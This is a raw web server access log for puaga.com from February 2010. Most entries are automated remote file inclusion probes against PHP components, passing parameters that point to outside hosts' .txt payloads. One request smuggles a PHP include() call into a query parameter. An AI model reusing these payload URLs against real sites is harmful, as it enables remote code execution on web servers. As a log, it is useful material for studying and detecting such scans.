69.64.70.246 - - [25/Feb/2010:09:22:19 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:22:38 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:22:39 -0800] "GET /logs/access_100206.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:22:39 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:22:45 -0800] "GET /logs/access_100206.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:22:45 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:22:45 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:23:08 -0800] "GET /logs/access_100218.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:23:09 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:23:10 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:23:10 -0800] "GET /logs/access_100206.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:23:13 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:23:13 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:23:13 -0800] "GET /logs/access_100206.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.169.49 - - [25/Feb/2010:09:23:18 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
174.129.169.49 - - [25/Feb/2010:09:23:18 -0800] "GET /orange_g/forum/viewtopic.php?p=25797 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
64.15.152.132 - - [25/Feb/2010:09:23:41 -0800] "GET /logs/access_100206.log///plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:23:48 -0800] "GET /technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:23:48 -0800] "GET /logs//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:23:48 -0800] "GET /logs/access_100125.log//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:24:02 -0800] "GET /logs/access_100206.log///plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:24:07 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:24:07 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:24:11 -0800] "GET /technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:24:11 -0800] "GET /logs//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:24:11 -0800] "GET /logs/access_100125.log%20%20//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:24:13 -0800] "GET /technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:24:13 -0800] "GET /logs/access_100125.log%20%20//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:24:13 -0800] "GET /logs//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:24:16 -0800] "GET /logs/access_100125.log//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:24:16 -0800] "GET /logs//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:24:16 -0800] "GET /technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:24:42 -0800] "GET /logs/access_100206.log///plugin/replace/plugin.php?PHORUM[settings_dir]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:09:24:51 -0800] "GET /com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:09:24:51 -0800] "GET /logs/access_100131.log%20%20//com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:09:24:51 -0800] "GET /logs//com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:25:04 -0800] "GET /logs/access_100208.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:25:05 -0800] "GET /logs/access_100218.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:25:32 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:25:33 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:26:03 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:26:03 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
123.143.29.250 - - [25/Feb/2010:09:26:13 -0800] "GET /logs//admin.joomlaflashfun.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:09:26:14 -0800] "GET /logs/access_100214.log%20%20//admin.joomlaflashfun.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:09:26:19 -0800] "GET /admin.joomlaflashfun.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:26:29 -0800] "GET /logs/access_100120.log%20%20//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:27:10 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:27:10 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 1346 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:27:17 -0800] "GET /logs/access_100120.log%20%20//technote6//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:27:43 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:27:43 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:27:43 -0800] "GET /logs/access_100206.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.129.163.50 - - [25/Feb/2010:09:27:50 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
174.129.163.50 - - [25/Feb/2010:09:27:50 -0800] "GET /orange_g/forum/viewtopic.php?p=20307 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
89.36.175.10 - - [25/Feb/2010:09:28:41 -0800] "GET /logs/co.uk/components/com_moofaq/includes/file_includer.=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:28:41 -0800] "GET /logs/access_100211.log/co.uk/components/com_moofaq/includes/file_includer.=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [25/Feb/2010:09:28:41 -0800] "GET /co.uk/components/com_moofaq/includes/file_includer.=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [25/Feb/2010:09:29:03 -0800] "GET /admin.joomlaflashfun.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [25/Feb/2010:09:29:03 -0800] "GET /logs/access_100214.log//admin.joomlaflashfun.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [25/Feb/2010:09:29:03 -0800] "GET /logs//admin.joomlaflashfun.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [25/Feb/2010:09:29:24 -0800] "GET /logs/access_100214.log//admin.joomlaflashfun.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:09:29:51 -0800] "GET /logs/access_100123.log%20%20//include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:09:29:51 -0800] "GET /logs//include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:09:29:52 -0800] "GET /include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:09:30:34 -0800] "GET /include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:09:30:34 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:09:30:34 -0800] "GET /logs//include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:30:55 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:31:09 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:31:09 -0800] "GET /logs/access_100119.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:31:09 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:31:38 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://kortech.cn/bbs/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:31:38 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://kortech.cn/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [25/Feb/2010:09:31:38 -0800] "GET /logs/access_100119.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://kortech.cn/bbs/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:31:40 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:31:40 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:31:40 -0800] "GET /logs/access_100119.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:31:42 -0800] "GET /logs/access_100119.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:31:42 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:31:43 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:32:02 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:32:02 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:09:32:02 -0800] "GET /logs/access_100119.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:32:26 -0800] "GET /logs////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:32:26 -0800] "GET /logs/access_100121.log%20%20////delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:32:26 -0800] "GET ///delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:32:27 -0800] "GET /administrator/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:32:27 -0800] "GET /logs/administrator/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:32:27 -0800] "GET /logs/access_100217.log%20%20/administrator/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [25/Feb/2010:09:32:31 -0800] "GET /logs/access_100203.log%20%20/administrator/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:32:46 -0800] "GET /logs/access_100119.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:32:46 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:32:47 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:32:48 -0800] "GET /logs/access_100119.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:32:49 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [25/Feb/2010:09:32:49 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:32:55 -0800] "GET //plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:32:55 -0800] "GET /logs///plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:32:56 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:32:57 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 5593 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:33:08 -0800] "GET /logs/access_100119.log%20%20///plugin/replace/plugin.php?PHORUM[settings_dir]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [25/Feb/2010:09:33:14 -0800] "GET /logs/access_091108.log//admin.joomlaflashfun.php?mosConfig_live_site=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:33:22 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:33:22 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:33:23 -0800] "GET /logs/access_100213.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [25/Feb/2010:09:33:40 -0800] "GET /logs/access_100201.log%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:09:33:42 -0800] "GET /logs/access_100123.log//include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:09:33:43 -0800] "GET /logs//include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.54.168.116 - - [25/Feb/2010:09:33:43 -0800] "GET /include.php?path[docroot]=http://jonervdd.webs.com/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:34:24 -0800] "GET /pack/applist.txt HTTP/1.1" 206 148 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
78.188.102.171 - - [25/Feb/2010:09:34:26 -0800] "GET /pack//applications/grader/icon.gif HTTP/1.1" 206 5593 "-" "Microsoft URL Control - 6.00.8169" "simple.puaga.com"
212.241.177.123 - - [25/Feb/2010:09:35:04 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:09:35:04 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:09:35:04 -0800] "GET /logs/access_100129.log//bbs//delete_all.php?board_skin_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:09:35:09 -0800] "GET /logs/access_100202.log//bbs//delete_all.php?board_skin_path=http://www.thaz.de//jackz/AinuLid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.202.13.67 - - [25/Feb/2010:09:35:17 -0800] "GET /orange_g/forum/index.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
89.36.175.10 - - [25/Feb/2010:09:35:43 -0800] "GET /logs/access_100211.log%20%20/co.uk/components/com_moofaq/includes/file_includer.=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
